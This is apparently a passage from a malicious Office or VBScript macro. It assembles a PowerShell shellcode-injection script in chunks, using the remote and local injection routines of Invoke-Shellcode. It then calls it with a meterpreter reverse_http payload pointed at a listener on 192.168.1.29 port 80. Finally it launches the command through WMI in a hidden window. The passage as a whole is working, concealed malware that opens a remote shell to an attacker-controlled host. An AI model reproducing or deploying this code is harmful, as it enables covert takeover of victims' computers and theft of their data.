jC = jC + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
jC = jC + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
jC = jC + "$VirtualAllocEx = [System.Runtime.InteropServices."
jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
jC = jC + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
jC = jC + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
jC = jC + "WriteProcessMemory"
$WriteProcessMemoryDel"
jC = jC + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
jC = jC + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
jC = jC + ")"
$WriteProcessMemory = [System.Runtime.I"
jC = jC + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
jC = jC + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
jC = jC + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
jC = jC + "ocAddress kernel32.dll CreateRemoteThread"
"
jC = jC + " $CreateRemoteThreadDelegate = Get-DelegateType @("
jC = jC + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
jC = jC + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
jC = jC + "oteThread = [System.Runtime.InteropServices.Marsha"
jC = jC + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
jC = jC + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
jC = jC + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
jC = jC + "Handle"
$CloseHandleDelegate = Get-Delegat"
jC = jC + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
jC = jC + " [System.Runtime.InteropServices.Marshal]::GetDele"
jC = jC + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
jC = jC + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
jC = jC + "ouldContinue( 'Do you wish to carry out your evil "
jC = jC + "plans?',"
"Injecting shellcode in"
jC = jC + "jecting into $((Get-Process -Id $ProcessId).Proces"
jC = jC + "sName) ($ProcessId)!" ) )
{
"
jC = jC + "Inject-RemoteShellcode $ProcessId"
}
"
jC = jC + "}"
Else
{
$VirtualAllocAddr = Ge"
jC = jC + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
jC = jC + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
jC = jC + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
jC = jC + " $VirtualAlloc = [System.Runtime.InteropServices."
jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
jC = jC + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
jC = jC + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
jC = jC + ""
$VirtualFreeDelegate = Get-DelegateType "
jC = jC + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
jC = jC + "$VirtualFree = [System.Runtime.InteropServices.Mar"
jC = jC + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
jC = jC + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
jC = jC + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
jC = jC + " $CreateThreadDelegate = Get-DelegateType @("
jC = jC + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
jC = jC + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
jC = jC + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
jC = jC + "orFunctionPointer($CreateThreadAddr, $CreateThread"
jC = jC + "Delegate)"
$WaitForSingleObjectAddr = Get-"
jC = jC + "ProcAddress kernel32.dll WaitForSingleObject"
"
jC = jC + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
jC = jC + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
jC = jC + "ngleObject = [System.Runtime.InteropServices.Marsh"
jC = jC + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
jC = jC + "bjectAddr, $WaitForSingleObjectDelegate)"
"
jC = jC + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
jC = jC + "wish to carry out your evil plans?',"
"
jC = jC + " "Injecting shellcode into the running PowerSh"
jC = jC + "ell process!" ) )
{
Inject-L"
jC = jC + "ocalShellcode"
}
}
}
Invoke-Shell"
jC = jC + "code -Payload windows/meterpreter/reverse_http -Lh"
jC = jC + "ost 192.168.1.29 -Lport 80 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create jC, Null, objConfig, intProcessID
End Function